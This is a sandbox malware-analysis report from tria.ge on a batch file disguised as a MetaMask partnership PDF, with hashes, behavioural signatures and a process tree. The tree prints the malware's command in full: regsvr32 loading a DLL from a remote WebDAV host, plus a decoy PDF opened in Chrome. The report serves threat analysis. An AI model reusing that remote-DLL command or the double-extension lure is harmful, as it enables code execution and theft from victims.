Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
599s -
max time network
492s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system -
submitted
21/08/2023, 12:53
Static task
static1
Behavioral task
behavioral1
Sample
MetaMask Partnership.pdf.bat
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
MetaMask Partnership.pdf.bat
Resource
win10-20230703-en
Behavioral task
behavioral3
Sample
MetaMask Partnership.pdf.bat
Resource
win10v2004-20230703-en
General
-
Target
MetaMask Partnership.pdf.bat
-
Size
157B
-
MD5
6a03d15802a8d61952739fcb12264885
-
SHA1
9f3029848c534f9cbf99b379397280327ab1461b
-
SHA256
5bd3be9405819229934a4acbb06904937e53ec13e5b87736478031d2c6d38c1f
-
SHA512
55dff3b6b9858c79ffae99b03e434baf93dcbb5c47430608c840ad3a3b9c0523eda82c0774bbe1856c2e48665172373591277d894914118350af8bf25f87ea9b
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133370960667568749" chrome.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2344 chrome.exe 2344 chrome.exe 2060 chrome.exe 2060 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe Token: SeShutdownPrivilege 2344 chrome.exe Token: SeCreatePagefilePrivilege 2344 chrome.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe 2344 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4576 wrote to memory of 5084 4576 cmd.exe 70 PID 4576 wrote to memory of 5084 4576 cmd.exe 70 PID 4576 wrote to memory of 5084 4576 cmd.exe 70 PID 4576 wrote to memory of 2344 4576 cmd.exe 71 PID 4576 wrote to memory of 2344 4576 cmd.exe 71 PID 2344 wrote to memory of 3152 2344 chrome.exe 73 PID 2344 wrote to memory of 3152 2344 chrome.exe 73 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 2252 2344 chrome.exe 79 PID 2344 wrote to memory of 3024 2344 chrome.exe 75 PID 2344 wrote to memory of 3024 2344 chrome.exe 75 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76 PID 2344 wrote to memory of 1128 2344 chrome.exe 76
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\MetaMask Partnership.pdf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWoW64\regsvr32.exeC:\Windows\SysWoW64\regsvr32.exe \\139.99.32.95@8000\DavWWWRoot\1.dll2⤵PID:5084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.exodus.com/assets/docs/binance-coin-whitepaper.pdf2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffebfa9758,0x7fffebfa9768,0x7fffebfa97783⤵PID:3152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1856 --field-trial-handle=1828,i,12954549457822286583,16231827368321745629,131072 /prefetch:83⤵PID:3024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2116 --field-trial-handle=1828,i,12954549457822286583,16231827368321745629,131072 /prefetch:83⤵PID:1128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2912 --field-trial-handle=1828,i,12954549457822286583,16231827368321745629,131072 /prefetch:13⤵PID:4832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2904 --field-trial-handle=1828,i,12954549457822286583,16231827368321745629,131072 /prefetch:13⤵PID:2288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1536 --field-trial-handle=1828,i,12954549457822286583,16231827368321745629,131072 /prefetch:23⤵PID:2252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4380 --field-trial-handle=1828,i,12954549457822286583,16231827368321745629,131072 /prefetch:13⤵PID:3404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --pdf-renderer --lang=en-US --js-flags=--jitless --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3832 --field-trial-handle=1828,i,12954549457822286583,16231827368321745629,131072 /prefetch:13⤵PID:4520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4996 --field-trial-handle=1828,i,12954549457822286583,16231827368321745629,131072 /prefetch:83⤵PID:4308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 --field-trial-handle=1828,i,12954549457822286583,16231827368321745629,131072 /prefetch:83⤵PID:4712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 --field-trial-handle=1828,i,12954549457822286583,16231827368321745629,131072 /prefetch:83⤵PID:4612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3808 --field-trial-handle=1828,i,12954549457822286583,16231827368321745629,131072 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:2060
-
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:316
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\9091747b-dd9f-48ee-b700-b67b444d7c48.tmp
Filesize6KB
MD561017dba9db0e62ed523d6a355f35c7f
SHA15a209508587e3137ec47fe633f23457f589dfc66
SHA2568adafa3cd98b34b1261dc3e9f823f1b74d78cf47db099483d62d9184d3c34ae3
SHA5128597e51d3ea5b8e9194b8399b26acbf903fa7439bca57ec3ee6ef915f6db712b343377298b3c4b0546f8273ef94e579ae71ee439fa73a297dbdf33c8739227dd
-
Filesize
820B
MD5d638fa8ec4513000c2c9dd9e3e61fc6c
SHA182dee935c1527d21574bb9d0fc475324482eeb45
SHA25651276ad33c7565e7c1e271f3a2e082413ae31687b1114c467e240d54b08e6abf
SHA5129b1e5b3746a2d57156c77466aff14ba01eb66e9101039041556f8b5c0fb091e52431ffed3b4508346d13f19df65290039681a774de609166708e95624e9df615
-
Filesize
538B
MD59257dc781048448d758d460ce93f5fa6
SHA1b30412b4e765146eca91daa214f7aaed37c043ad
SHA256d3119c3cdeb3cd3697bd86bf493a73901847f0bdf917c7ec19f5a12b310d80a4
SHA5122b42d40be5b26de82df7d1ad41fc21eb7d5d84d4280b338b3ba871d02531d49646fbc65274a05193181a09c73ae225cc531006028ad9373bd8701653084905f8
-
Filesize
6KB
MD55c6516c05e9485794185b3c2b493e050
SHA10bb995c966a078fb8fdcd30a8690efa8ba7d021f
SHA25676e94d8804835d88f66365eee3c8c666614c1c89dc0ee7eaa6f339be24cfbb01
SHA5127cd20a8db575b5f482a41e289c2c8685c7478820fda9e7b7b7b4f1edb0e6cf09376f50ff74283ff64c357fec7b24aa4e1f4f88bccc3b3bc1d570dae1187d7d0f
-
Filesize
6KB
MD57af27257a468cf226bd80dc3c5856a4e
SHA1fb1cf57cc07566eacf30cf171237103fb6e88d47
SHA25644ecdb71d51531f5a5a8daafc24c3b0ca710c2d62483884c6ed4b2b3d0571af9
SHA5122018fc7377e9a24bb0ceb9f4693fa615aca06f98e4ba61df76d44bdc5f30f6020bed37e2a6548b3675b8c6888b5603901607a07cc401661d20d53c9cb760e169
-
Filesize
12KB
MD558fac6055eb03991db415f213cda7365
SHA18d81a92f2280febba08d75bc91c8bd85c997e0da
SHA2568a445442bb62f0b428dda6294a5fc72aab6efbb474936a9046d85ae9eebcec34
SHA512733af80e8d5cf364654075f8f7af154cf9f06ca718ff2b7d2c4743506829db34c5aa854db8bc1e6b94eb92a7ce567b3b9d8eda8c29d281e7bf798729bae963b9
-
Filesize
176KB
MD53a16caa6fe76b1baa67d55f6eaa7f07f
SHA13eb89918022915f8ce94cdfe276c49a4654d5e41
SHA2561318daf4bb752fc8fb8869a1496f67ebb3a6776d8aaf7db9d4c5b200233bc980
SHA512533349d9768780e5d8ee1407965bbf5025055b0d6fdb83f7cb70a4c6afc461e1ddf1790c8ffce7ecf3ad333c7d678b5ba0e71ac86d12238887fd40f75f735fc9
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd